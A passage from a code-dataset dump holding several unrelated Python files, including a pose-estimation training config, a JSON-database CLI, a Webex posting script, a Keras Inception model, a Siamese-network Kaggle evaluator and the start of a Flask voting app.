75),\n (71, 79),\n #\n ((69, 70), 77),\n ((72, 73), 81),\n #\n (74, 84),\n (75, 85),\n (76, 86),\n (77, 87),\n (78, 88),\n (79, 89),\n (80, 90),\n (81, 91),\n (82, 92),\n (83, 93),\n (84, 94),\n (85, 95),\n (86, 96),\n (87, 97),\n (88, 98),\n (89, 99),\n (90, 100),\n (91, 101),\n (92, 102),\n (93, 103)\n]\n\nmapping_wflw = [\n #\n (0, 0),\n (1, 1),\n (2, 2),\n (3, 3),\n (4, 4),\n (5, 5),\n (6, 6),\n (7, 7),\n (8, 8),\n (9, 9),\n (10, 10),\n (11, 11),\n (12, 12),\n (13, 13),\n (14, 14),\n (15, 15),\n (16, 16),\n (17, 17),\n (18, 18),\n (19, 19),\n (20, 20),\n (21, 21),\n (22, 22),\n (23, 23),\n (24, 24),\n (25, 25),\n (26, 26),\n (27, 27),\n (28, 28),\n (29, 29),\n (30, 30),\n (31, 31),\n (32, 32),\n #\n (33, 33),\n (34, 34),\n (35, 35),\n (36, 36),\n (37, 37),\n (38, 38),\n (39, 39),\n (40, 40),\n (41, 41),\n #\n (42, 42),\n (43, 43),\n (44, 44),\n (45, 45),\n (46, 46),\n (47, 47),\n (48, 48),\n (49, 49),\n (50, 50),\n #\n (51, 51),\n (52, 52),\n (53, 53),\n (54, 54),\n #\n (55, 58),\n (56, 59),\n (57, 60),\n (58, 61),\n (59, 62),\n #\n (60, 66),\n (61, 67),\n (62, 68),\n (63, 69),\n (64, 70),\n (65, 71),\n (66, 72),\n (67, 73),\n #\n (68, 75),\n (69, 76),\n (70, 77),\n (71, 78),\n (72, 79),\n (73, 80),\n (74, 81),\n (75, 82),\n #\n (76, 84),\n (77, 85),\n (78, 86),\n (79, 87),\n (80, 88),\n (81, 89),\n (82, 90),\n (83, 91),\n (84, 92),\n (85, 93),\n (86, 94),\n (87, 95),\n (88, 96),\n (89, 97),\n (90, 98),\n (91, 99),\n (92, 100),\n (93, 101),\n (94, 102),\n (95, 103),\n #\n (96, 104),\n #\n (97, 105)\n]\n\nmapping_cofw = [\n #\n (0, 33),\n (2, 38),\n (4, 35),\n (5, 40),\n #\n (1, 46),\n (3, 50),\n (6, 44),\n (7, 48),\n #\n (8, 60),\n (10, 64),\n (12, 62),\n (13, 66),\n #\n (9, 72),\n (11, 68),\n (14, 70),\n (15, 74),\n #\n (18, 57),\n (19, 63),\n (20, 54),\n (21, 60),\n #\n (22, 84),\n (23, 90),\n (24, 87),\n (25, 98),\n (26, 102),\n (27, 93),\n #\n (28, 16)\n]\ndataset_coco = dict(\n type='CocoWholeBodyFaceDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='coco/annotations/coco_wholebody_train_v1.0.json',\n data_prefix=dict(img='detection/coco/train2017/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=kpt_68_to_106)\n ],\n)\n\ndataset_wflw = dict(\n type='WFLWDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='wflw/annotations/face_landmarks_wflw_train.json',\n data_prefix=dict(img='pose/WFLW/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_wflw)\n ],\n)\n\ndataset_300w = dict(\n type='Face300WDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='300w/annotations/face_landmarks_300w_train.json',\n data_prefix=dict(img='pose/300w/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=kpt_68_to_106)\n ],\n)\n\ndataset_cofw = dict(\n type='COFWDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='cofw/annotations/cofw_train.json',\n data_prefix=dict(img='pose/COFW/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_cofw)\n ],\n)\n\ndataset_halpe = dict(\n type='HalpeDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='halpe/annotations/halpe_train_133kpt.json',\n data_prefix=dict(img='pose/Halpe/hico_20160224_det/images/train2015/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_halpe)\n ],\n)\n\n# data loaders\ntrain_dataloader = dict(\n batch_size=256,\n num_workers=10,\n persistent_workers=True,\n sampler=dict(type='DefaultSampler', shuffle=True),\n dataset=dict(\n type='CombinedDataset',\n metainfo=dict(from_file='configs/_base_/datasets/lapa.py'),\n datasets=[\n dataset_lapa, dataset_coco, dataset_wflw, dataset_300w,\n dataset_cofw, dataset_halpe\n ],\n pipeline=train_pipeline,\n test_mode=False,\n ))\nval_dataloader = dict(\n batch_size=32,\n num_workers=10,\n persistent_workers=True,\n drop_last=False,\n sampler=dict(type='DefaultSampler', shuffle=False, round_up=False),\n dataset=dict(\n type=dataset_type,\n data_root=data_root,\n data_mode=data_mode,\n ann_file='LaPa/annotations/lapa_test.json',\n data_prefix=dict(img='pose/LaPa/'),\n test_mode=True,\n pipeline=val_pipeline,\n ))\n\n# test dataset\nval_lapa = dict(\n type=dataset_type,\n data_root=data_root,\n data_mode=data_mode,\n ann_file='LaPa/annotations/lapa_test.json',\n data_prefix=dict(img='pose/LaPa/'),\n pipeline=[],\n)\n\nval_coco = dict(\n type='CocoWholeBodyFaceDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='coco/annotations/coco_wholebody_val_v1.0.json',\n data_prefix=dict(img='detection/coco/val2017/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=kpt_68_to_106)\n ],\n)\n\nval_wflw = dict(\n type='WFLWDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='wflw/annotations/face_landmarks_wflw_test.json',\n data_prefix=dict(img='pose/WFLW/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_wflw)\n ],\n)\n\nval_300w = dict(\n type='Face300WDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='300w/annotations/face_landmarks_300w_test.json',\n data_prefix=dict(img='pose/300w/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=kpt_68_to_106)\n ],\n)\n\nval_cofw = dict(\n type='COFWDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='cofw/annotations/cofw_test.json',\n data_prefix=dict(img='pose/COFW/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_cofw)\n ],\n)\n\nval_halpe = dict(\n type='HalpeDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='halpe/annotations/halpe_val_v1.json',\n data_prefix=dict(img='detection/coco/val2017/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_halpe)\n ],\n)\n\ntest_dataloader = dict(\n batch_size=32,\n num_workers=10,\n persistent_workers=True,\n drop_last=False,\n sampler=dict(type='DefaultSampler', shuffle=False, round_up=False),\n dataset=dict(\n type='CombinedDataset',\n metainfo=dict(from_file='configs/_base_/datasets/lapa.py'),\n datasets=[val_lapa, val_coco, val_wflw, val_300w, val_cofw, val_halpe],\n pipeline=val_pipeline,\n test_mode=True,\n ))\n\n# hooks\ndefault_hooks = dict(\n checkpoint=dict(\n save_best='NME', rule='less', max_keep_ckpts=1, interval=1))\n\ncustom_hooks = [\n dict(\n type='EMAHook',\n ema_type='ExpMomentumEMA',\n momentum=0.0002,\n update_buffers=True,\n priority=49),\n dict(\n type='mmdet.PipelineSwitchHook',\n switch_epoch=max_epochs - stage2_num_epochs,\n switch_pipeline=train_pipeline_stage2)\n]\n\n# evaluators\nval_evaluator = dict(\n type='NME',\n norm_mode='keypoint_distance',\n)\ntest_evaluator = val_evaluator\n","sub_path":"configs/face_2d_keypoint/rtmpose/face6/rtmpose-m_8xb256-120e_face6-256x256.py","file_name":"rtmpose-m_8xb256-120e_face6-256x256.py","file_ext":"py","file_size_in_byte":14494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"599413306","text":"import csv\nimport json\nimport os\nfrom pathlib import Path\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nimport fire\nfrom beautifultable import BeautifulTable\n\nfrom pysondb.core.db import getDb\n\n\ndef create_if_not_exist(file_name: str) -> None:\n \"\"\"\n Checks for the existence of the provided JSON DB.\n If it does not, this will add {data:[]}.\n :param str file_name: The absolute path to the DB file\n \"\"\"\n if not os.path.exists(file_name):\n with open(file_name, \"w\") as db_file:\n db: Dict[str, Any] = {}\n json.dump(db, db_file)\n print(\"Succesfully created {} in the directory.\".format(file_name))\n\n\ndef display(file_name: str) -> None:\n\n if file_name.endswith(\".json\") and Path(file_name).is_file() is True:\n\n table = BeautifulTable()\n with open(file_name) as jsondoc:\n data = json.load(jsondoc)\n if data:\n header = [\"id\"] + list(list(data.values())[0].keys())\n for _id, data in data.items():\n table.rows.append([_id] + list(data.values()))\n table.columns.header = header\n print(table)\n\n\ndef delete(file_name: str) -> None:\n if Path(file_name).is_file() is True and file_name.endswith(\".json\"):\n x = input(\"Do you want to remove the json file..(y/n)\")\n if x.lower() == \"y\":\n os.remove(file_name)\n else:\n print(\"Action terminated\")\n else:\n print(\"The file does not exist\")\n\n\ndef convert(csv_file: str, json_db: str) -> None:\n if csv_file.endswith(\".csv\") and Path(csv_file).is_file() is True:\n with open(csv_file, \"r\") as f:\n reader = csv.DictReader(f)\n\n a = getDb(json_db)\n a.addMany([i for i in reader])\n\n\ndef convert_db_to_csv(db: str, targetcsv: str = \"converted.csv\") -> None:\n \"\"\"\n Converts a JSON database to a csv.\n :param str db: path of the target json file\n :param str targetcsv: path of the converted csv ,default : converted.csv\n \"\"\"\n if db.endswith(\".json\") and Path(db).is_file() is True:\n a = getDb(db)\n dict_data = a.getAll()\n data: List[Any] = [dict_data[i] for i in dict_data]\n headers = data[0].keys()\n\n with open(targetcsv, \"w\", newline=\"\") as f:\n dict_writer: Any = csv.DictWriter(f, headers)\n dict_writer.writeheader()\n dict_writer.writerows(data)\n\n\ndef merge(p_file: str, m_file: str, output_file: Optional[str] = None) -> None:\n \"\"\"\n Merges two json DB with the same schema\n :param str p_file: The primary file\n :param str m_file: The file to combine with p_file\n :param str output_file: The name of the output file, default: p_file\n \"\"\"\n\n def verify_file(\n file_data: Dict[str, Dict[str, Any]], refer_keys: List[str], filename: str\n ) -> None:\n for d in file_data:\n temp_keys = list(file_data[d].keys())\n temp_keys.sort()\n if not temp_keys == refer_keys:\n print(f\"Irregularities in key names in database {filename!r}\")\n quit()\n\n o_file = output_file or p_file\n with open(p_file, \"r\") as p, open(m_file) as m:\n try:\n p_data = json.load(p)\n m_data = json.load(m)\n\n # look up primary data: a reference to the first data entry\n lp_data = list(p_data.values())[0]\n lm_data = list(m_data.values())[0]\n\n # verify that all the entries in each DB have the same keys\n p_keys = sorted(list(set(lp_data)))\n m_keys = sorted(list(set(lm_data)))\n\n verify_file(p_data, p_keys, p_file)\n verify_file(m_data, m_keys, m_file)\n\n except KeyError:\n print(\"Oops, the DB's does not follow the required PysonDb schema.\")\n quit()\n except IndexError:\n print(\"One of the Database is empty\")\n quit()\n\n # merge the two DB together\n\n if len(lp_data) == len(lm_data):\n if all(i in lm_data for i in lp_data):\n\n p_data.update(m_data)\n\n with open(o_file, \"w\") as f:\n print(p_data)\n json.dump(p_data, f)\n else:\n print(\"The keys of the Database entries does not match\")\n else:\n print(\"The number keys in DB entries does not match\")\n pass\n\n\ndef totwo(primary_file: str, output_file: Optional[str] = None) -> None:\n \"\"\"Convert the old schema style DB to the new style\"\"\"\n\n if not Path(primary_file).is_file():\n print(\"The file does not exist\")\n quit()\n\n with open(primary_file, \"r\") as f:\n try:\n new_data: Dict[str, Dict[str, Any]] = {}\n file_contents = json.load(f)\n file_data = file_contents[\"data\"]\n\n for d in file_data:\n _id = d.pop(\"id\")\n new_data[_id] = d\n\n with open(output_file or \"converted_data.json\", \"w\") as f:\n json.dump(new_data, f, indent=4)\n\n except Exception:\n print(\"something went wrong\")\n quit()\n\n\ndef main() -> None:\n fire.Fire(\n {\n \"create\": create_if_not_exist,\n \"display\": display,\n \"delete\": delete,\n \"convert\": convert,\n \"converttocsv\": convert_db_to_csv,\n \"merge\": merge,\n \"totwo\": totwo\n }\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pysondb/cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502408688","text":"import configparser\r\nimport requests\r\nimport datetime\r\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\r\nconfig = configparser.RawConfigParser()\r\nconfig.read('/var/www/settings.ini')\r\n\r\ngAuth = config['GIPHIER']['Token']\r\nkAuth = config['KHALKEUS']['Token']\r\naAuth = config['AARON']['Token']\r\n\r\nroom = config['CHICO']['ID']\r\nperson = 'alangford@xceptional.com'\r\n\r\nimages = {\r\n 'ayb': config['IMAGES']['AYB'],\r\n 'developer': config['IMAGES']['Developer'],\r\n 'afx': config['IMAGES']['Afx'],\r\n 'automation': config['IMAGES']['Automation'],\r\n 'hephaestus': config['IMAGES']['Hephaestus'],\r\n 'turk': config['IMAGES']['Turk'],\r\n 'matters': config['IMAGES']['Matters'],\r\n 'lunch': config['IMAGES']['Lunch'],\r\n 'garfield': config['IMAGES']['Garfield'],\r\n 'towel': config['IMAGES']['Towel']\r\n}\r\nm = MultipartEncoder({'roomId': room,\r\n 'text': 'test',\r\n 'files': (images['hephaestus'], open(images['hephaestus'], 'rb'),\r\n '')})\r\n\r\nr = requests.post('https://api.ciscospark.com/v1/messages', data=m,\r\n headers={'Authorization': 'Bearer {auth}'.format(auth=aAuth),\r\n 'Content-Type': m.content_type})\r\n\r\nprint(r.text)\r\n","sub_path":"examples/webex-post-message-to-person.py","file_name":"webex-post-message-to-person.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438064802","text":"# 직사각형에서 탈출\n# 문제\n# 한수는 지금 (x, y)에 있다. 직사각형의 왼쪽 아래 꼭짓점은 (0, 0)에 있고, 오른쪽 위 꼭짓점은 (w, h)에 있다. 직사각형의 경계선까지 가는 거리의 최솟값을 구하는 프로그램을 작성하시오.\n\n# 입력\n# 첫째 줄에 x y w h가 주어진다. w와 h는 1,000보다 작거나 같은 자연수이고, x는 1보다 크거나 같고, w-1보다 작거나 같은 자연수이고, y는 1보다 크거나 같고, h-1보다 작거나 같은 자연수이다.\n\n# 출력\n# 첫째 줄에 문제의 정답을 출력한다.\n\nx, y, w, h = input().split()\nx, y, w, h = int(x), int(y), int(w), int(h)\n\ndif_x = w - x if (w - x) <= x else x\ndif_y = h - y if (h - y) <= y else y\n\nprint(dif_x if dif_x <= dif_y else dif_y)\n","sub_path":"baekjoon/1085_baekjoon.py","file_name":"1085_baekjoon.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"19660837","text":"import pandas as pd\n\nfrom sklearn.externals import joblib\nfrom sklearn.pipeline import Pipeline\nfrom regression_model.config import config # i need to import config while making sure it doesnt disrupt the folders\nfrom regression_model.config import logging_config\nfrom regression_model import __version__ as _version\n\n\n_logger = logging_config.get_logger()\n\n\n\ndef load_dataset(*, file_name: str) -> pd.DataFrame:\n data_path = config.DATASET_DIR / file_name\n data = pd.read_csv(filepath_or_buffer=data_path)\n return data\n\n\n\ndef save_pipeline(*, pipeline_to_persist) -> None:\n #saves the versioned model, and overwrites the previous saved models\n #This ensures that when the package is published, there is only one trained\n #model that can be called, and we know exactly how it was built.\n\n\n\n #prepare versioned save file name\n save_file_name = f\"{config.PIPELINE_SAVE_FILE}{_version}.pkl\"\n save_path = config.TRAINED_MODEL_DIR / save_file_name\n remove_old_pipelines(files_to_keep=save_file_name)\n joblib.dump(pipeline_to_persist, save_path)\n _logger.info(f\"saved pipeline: {save_file_name}\")\n\n \n\n\n\ndef load_pipeline(*, file_name: str) -> Pipeline:\n file_path = config.TRAINED_MODEL_DIR / file_name\n trained_model = joblib.load(filename=file_path)\n return trained_model\n\n\n\ndef remove_old_pipelines(*, files_to_keep) -> None:\n \n #Removes old model pipelines\n #This is to ensure that there is a simple one-to-one\n #mapping between the package version and the model version\n #to be imported and used by other application\n\n for model_file in config.TRAINED_MODEL_DIR.iterdir():\n if model_file.name not in [files_to_keep, \"__init__.py\"]:\n model_file.unlink()","sub_path":"packages/regression_model/processing/data_management.py","file_name":"data_management.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"653027323","text":"import tensorflow as tf \r\nfrom tensorflow.keras import layers, Model, Sequential \r\nfrom tensorflow import keras\r\nfrom tensorflow.keras.layers import GlobalAveragePooling2D, Conv2D, MaxPooling2D, BatchNormalization, Dropout, Dense, Input, Concatenate\r\nimport sys \r\nimport numpy as np \r\nfrom tensorflow.keras.datasets import cifar100\r\n\r\n# import dataset here \r\n\r\n# x_train = np.reshape(x_train, (-1, 224, 224, 3)).astype('float32') / 255.0\r\n# x_test = np.reshape(x_test, (-1, 224, 224, 3)).astype('float32') / 255.0\r\n\r\n# y_train = tf.keras.utils.to_categorical(y_train)\r\n# y_test = tf.keras.utils.to_categorical(y_test)\r\n\r\n# inception block input-> 3x3 Maxpooling , 1x1 5x5, 1x1 3x3, 1x1\r\n\r\nclass ConvBlock(layers.Layer):\r\n\tdef __init__(self, output_channels, kernals, strides, padding):\r\n\t\tsuper(ConvBlock, self).__init__()\r\n\t\tself.conv_1 = Conv2D(output_channels, kernals, strides=strides, padding=padding)\r\n\t\tself.bn = BatchNormalization()\r\n\r\n\tdef call(self, inputs, training = False):\r\n\t\tx = self.conv_1(inputs, training = training)\r\n\t\tx = self.bn(x, training = training)\r\n\t\treturn tf.nn.relu(x)\r\n\r\nclass InceptionBlock(layers.Layer):\r\n\tdef __init__(self, conv1, conv3_reduce, conv3, conv5_reduce, conv5, pool_projection):\r\n\t\tsuper(InceptionBlock, self).__init__()\r\n\t\tself.conv_1 = ConvBlock(conv1, 1, padding='same', strides=1)\r\n\t\tself.conv_2 = ConvBlock(conv3, 3, padding='same', strides=1)\r\n\t\tself.conv_3 = ConvBlock(conv5, 5, padding='same', strides=1)\r\n\t\tself.conv_4 = ConvBlock(pool_projection, 1, padding='same', strides=1)\r\n\r\n\t\tself.identity_1 = ConvBlock(conv3_reduce, 1, padding='same', strides=1)\r\n\t\tself.identity_2 = ConvBlock(conv5_reduce, 1, padding='same', strides=1)\r\n\r\n\t\tself.pool = MaxPooling2D(pool_size=3, padding = 'same', strides=1)\r\n\t\tself.concat = Concatenate(axis = -1)\r\n\r\n\tdef call(self, input_tensor, training = False):\r\n\t\tbranch_1 = self.conv_1(input_tensor)\r\n\r\n\t\tid_branch_2 = self.identity_1(input_tensor)\r\n\t\tbranch_2 = self.conv_2(id_branch_2)\r\n\r\n\t\tid_branch_3 = self.identity_2(input_tensor)\r\n\t\tbranch_3 = self.conv_3(id_branch_3)\r\n\r\n\t\tbranch_4 = self.pool(input_tensor)\r\n\t\tbranch_4 = self.conv_4(branch_4)\r\n\r\n\t\treturn MaxPooling2D(pool_size=3, padding = 'same', strides=1)(self.concat([branch_1, branch_2, branch_3, branch_4]))\r\n\r\nclass InceptionModel(keras.Model):\r\n\r\n\tdef __init__(self):\r\n\t\tsuper(InceptionModel, self).__init__()\r\n\t\tself.conv1 = ConvBlock(output_channels = 32, kernals = 3, padding='same', strides=1)\r\n\t\tself.pool = MaxPooling2D(3, 2)\r\n\t\tself.conv2 = ConvBlock(output_channels = 32, kernals = 3, padding='same', strides=1)\r\n\t\tself.conv3 = ConvBlock(output_channels = 32, kernals=3, padding='same', strides=1)\r\n\r\n\t\tself.identity_1 = Conv2D(32, 1, strides=1, padding='same')\r\n\t\tself.identity_2 = Conv2D(256, 1, strides=1, padding='same')\r\n\t\tself.identity_3 = Conv2D(528, 1, strides=1, padding='same')\r\n\r\n\t\tself.block3a = InceptionBlock(64, 96, 128, 16, 32, 32)\r\n\t\tself.block3b = InceptionBlock(128, 128, 192, 32, 96, 64)\r\n\r\n\t\tself.block4a = InceptionBlock(192, 96, 208, 16, 48, 64)\r\n\t\tself.block4b = InceptionBlock(160, 112, 224, 24, 64, 64)\r\n\t\tself.block4c = InceptionBlock(128, 128, 256, 24, 64, 64)\r\n\t\tself.block4d = InceptionBlock(112, 144, 288, 32, 64, 64)\r\n\t\tself.block4e = InceptionBlock(256, 160, 320, 32, 128, 128)\r\n\r\n\t\tself.block5a = InceptionBlock(256, 160, 320, 32, 128, 128)\r\n\t\tself.block5b = InceptionBlock(384, 192, 384, 48, 128, 128)\r\n\r\n\t\tself.avgpool = GlobalAveragePooling2D()\r\n\t\tself.drop = Dropout(0.4)\r\n\t\tself.final_layer = Dense(1000, activation='softmax')\r\n\r\n\tdef call(self, input_tensor):\r\n\r\n\t\tx = self.conv1(input_tensor)\r\n\t\tx = self.conv2(x)\r\n\t\tx = self.conv3(x + self.identity_1(input_tensor))\r\n\t\tx1 = MaxPooling2D(3, 2)(x)\r\n\r\n\t\tx = self.block3a(x1)\r\n\t\tx = self.block3b(x + self.identity_2(x1))\r\n\t\tx2 = MaxPooling2D(3, 2)(x)\r\n\r\n\t\tx = self.block4a(x2)\r\n\t\tx = self.block4b(x)\r\n\t\tx = self.block4c(x)\r\n\t\tx = self.block4d(x)\r\n\t\tx = self.block4e(x + MaxPooling2D()(self.identity_3(x1)))\r\n\t\tx = MaxPooling2D(3, 2)(x)\r\n\r\n\t\tx = self.block5a(x)\r\n\t\tx = self.block5b(x)\r\n\t\tx = self.avgpool(x)\r\n\t\tx = self.drop(x)\r\n\t\toutput_layer = self.final_layer(x)\r\n\r\n\t\treturn output_layer\r\n\r\n\tdef model(self):\r\n\t\tinput_layer = Input(shape=(1024, 1024, 3))\r\n\t\treturn Model(inputs = input_layer, outputs = self.call(input_layer))\r\n\r\nmodel = InceptionModel().model()\r\n\r\ndot_img_file = 'tmp/Inceptionv2.jpg'\r\ntf.keras.utils.plot_model(model, to_file=dot_img_file, show_shapes=True)","sub_path":"inception_net_with_skipConnections.py","file_name":"inception_net_with_skipConnections.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311303021","text":"\"\"\"\nRun with python3 precomputingEvaluator.py --path ../../DATA/weights.Siamese.best.binary_accuracy.training.hdf5\n --data ../../DATA --output June09_fixedSiamese_KaggleTestPredictions.txt > ../../DATA/June09_fixedSiamese_KaggleTestPredictions.log\n\"\"\"\nimport argparse\nimport keras\nimport h5py\nimport os\nimport keras.backend as K\nfrom keras.models import Sequential\nfrom keras.layers import Input, Lambda\nimport numpy as np\nimport time\n\n\nK.clear_session()\n\nparser = argparse.ArgumentParser(description='Evaluate a model on the test data and prepare a Kaggle output file')\nparser.add_argument('--path', help= 'paste path to the model file')\nparser.add_argument('--data', help= 'paste path to the data folder')\nparser.add_argument('--output', help= 'name for the output file (in the data folder), defaults to KaggleTestPredictions.txt', default = 'KaggleTestPredictions.txt')\nparser.add_argument('--layer_input', help= 'name of one of the input layers', default = 'input_1')\nparser.add_argument('--layer_leg', help= 'name of the whole leg layer', default = 'sequential_1')\nparser.add_argument('--layer_dense', help= 'name of one of the dense layer that computes the final output', default = 'dense_2')\n\n\n\nargs = parser.parse_args()\n\nprint(\"Loading the model from \" + args.path)\n\n\nmodel = keras.models.load_model(args.path)\nmodel.summary()\n\nprint(\"Model loaded\")\nprint(\"------------------\")\nprint(\"Input layer name: \" + args.layer_input)\nprint(\"Leg layer name : \" + args.layer_leg)\nprint(\"Dense layer name: \" + args.layer_dense)\nprint(\"------------------\")\n\n\n#Make the pre-compute model\nprecomputeModel = Sequential()\nfor layer in model.layers:\n if layer.name == args.layer_input:\n precomputeModel.add(layer)\n print(\"Input layer added to the precompute network\")\n if layer.name == args.layer_leg:\n precomputeModel.add(layer)\n print(\"Sequential layer added to the precompute network\")\nprint(\"Precompute network input: \" + str(precomputeModel.input.shape))\nprint(\"Precompute network output: \" + str(precomputeModel.output.shape))\nprecomputeModel.summary()\nprint(\"------------------\")\n\n\n#Make the comparison model\nfor layer in model.layers:\n if layer.name == args.layer_dense:\n print(\"Comparison function input: \" + str(layer.input.shape))\n print(\"Comparison function output: \" + str(layer.output.shape))\n newOutputs = layer\n comparisonFunction = K.function([layer.input],\n [layer.output])\n print(\"Comparison function is generated\")\n print(\"------------------\")\n\n# Load the test and data\ntrainDataset = h5py.File(os.path.join(args.data, 'tr_gr_64.h5'), 'r')\ntestDataset = h5py.File(os.path.join(args.data, 'tst_gr_64.h5'), 'r')\n\ntrainX = np.array(trainDataset['x'])\ntrainY = np.array(trainDataset['y']).astype('str')\ntestX = np.array(testDataset['test_data'])\ntestFileNames = np.array(testDataset['test_labels']).astype('str')[:, 0]\n\n# Do the precomputation\nprint(\"Pre-computing the training dataset...\")\nstart = time.time()\ntrainXprecomp = precomputeModel.predict(x = trainX[:, :, :, np.newaxis])\nprint(\"Pre-computing the training dataset took \" + str(int((time.time()-start))) + \" seconds\")\n\nprint(\"Pre-computing the test dataset...\")\nstart = time.time()\ntestXprecomp = precomputeModel.predict(x = testX[:, :, :, np.newaxis])\nprint(\"Pre-computing the test dataset took \" + str(int((time.time()-start))) + \" seconds\")\n\n\n# Set up the output dictionary\nguesses = {}\noutputFile = open(os.path.join(args.data, args.output),'w')\nprint(\"Saving output in: \" + str(os.path.join(args.data, args.output)))\nprint(\"------------------\")\noutputFile.write(\"Image,Id\")\n\naverageProcessingTime = 0\ni = 0\n\n# Iterate over the test dataset\nfor testImage, testName in zip(testXprecomp, testFileNames):\n i=i+1\n start = time.time()\n print(\"Lookin' up the whale in image \" + testName+\" [\" + str(i).zfill(5) + \"/\" + str(len(testFileNames)).zfill(5) + \"]. \", end='', flush=True)\n # See how similar the new image is to all the images in the train set.\n #predictions = model.predict(x = [np.repeat(testImage[ np.newaxis, :, :, np.newaxis], trainX.shape[0], axis=0), trainX[:, :, :, np.newaxis]])\n\n predictions = comparisonFunction([np.abs(trainXprecomp - testImage[np.newaxis,:])])\n predictions = predictions[0]\n\n # Find the 4 most similar images (based on the SECOND output which is how dissimilar they are. Hence we are looking for the FIRST entries\n ranks = np.argsort(predictions[:,1])\n sortedLabels = trainY[ranks]\n guesses[testName] = []\n for sortedLabel in sortedLabels: #needed as to make sure there are no dublicates\n if len(guesses[testName]) < 4 and sortedLabel not in guesses[testName]:\n guesses[testName].append(sortedLabel)\n print(\"Probably one of \", end='', flush=True)\n print(guesses[testName], end='', flush=True)\n\n # Save to the output file\n outputFile.write(\"\\n\"+testName + \",\")\n outputFile.write(\"new_whale\")\n for label in guesses[testName]:\n outputFile.write(\" \" + label)\n\n outputFile.flush()\n\n averageProcessingTime = (averageProcessingTime*(i-1)+ time.time() - start)/i\n print(\". Search took \" + str(int((time.time() - start)*1000)) + \"ms. Remaining time: \" + str(int((averageProcessingTime*(len(testFileNames)-i))/60)) + \" min.\")\n\noutputFile.close()\n","sub_path":"Evaluator/precomputingEvaluator.py","file_name":"precomputingEvaluator.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"508460644","text":"from datetime import timedelta\nimport json\n\nfrom flask import Flask, request, render_template, redirect\nfrom flask_jwt import JWT, jwt_required, current_identity\nfrom sqlalchemy.exc import IntegrityError\n\nfrom models import db, randString\nimport dbproxy\n\ndef create_app():\n app = Flask(__name__)\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\n app.config['SECRET_KEY'] = \"PLEASEWORK\"\n app.config['JWT_EXPIRATION_DELTA'] = timedelta(days=7)\n db.init_app(app)\n return app\n\napp = create_app()\napp.app_context().push()\ndb.create_all(app=app)\n\ndef authenticate(username, password):\n return dbproxy.authUser(username, password)\n\ndef identity(payload):\n return dbproxy.getUser(payload['identity'])\n\njwt = JWT(app, authenticate, identity)\n\n@app.route('/', methods=['GET'])\ndef index():\n\t return app.send_static_file('index.html'), 200\n\n@app.route('/', methods=['POST'])\ndef getUserId():\n user_data = request.get_json()\n try:\n user_id = dbproxy.getUserId(user_data['electionId'],\n user_data['email'], user_data['passcode'])\n except Exception as error:\n return error.args\n return json.dumps({'user_id': user_id}), 200\n\n@app.route('/create', methods=['GET'])\ndef goToCreatePage():\n return app.send_static_file('create.html'), 200\n\n@app.route('/create', methods=['POST'])\ndef createElection():\n data = request.get_json()\n try:\n dbproxy.newElection(data)\n except Exception as error:\n raise error\n #return error.args\n return 'Election created', 201\n\n@app.route('/vote', methods=['GET'])\ndef goToVotePage():\n return app.send_static_file('vote.html'), 200\n\n@app.route('/vote/', methods=['GET'])\n@jwt_required()\ndef loadBallot(election_id):\n try:\n ballot = dbproxy.getBallot(election_id, current_identity.id)\n except Exception as error:\n print(error.args)\n return error.args\n else:\n return json.dumps(ballot), 200\n\n@app.route('/vote/', methods=['PUT'])\n@jwt_required()\ndef castVote(election_id):\n ballot = request.get_json()\n try:\n dbproxy.castVote(election_id, current_identity.id, ballot)\n except Exception as error:\n print(error.args)\n return error.args\n return 'Vote Casted', 200\n\n@app.route('/results', methods=['GET'])\ndef goToResultsPage():\n return app.send_static_file('results.html'), 200\n\n@app.route('/results/', methods=['GET'])\n@jwt_required()\ndef getResults(election_id):\n try:\n results = dbproxy.getResults(election_id, current_identity.id)\n except Exception as error:\n print(error.args)\n return error.args\n return json.dumps(results), 200\n\n@app.route('/edit', methods=['GET'])\ndef 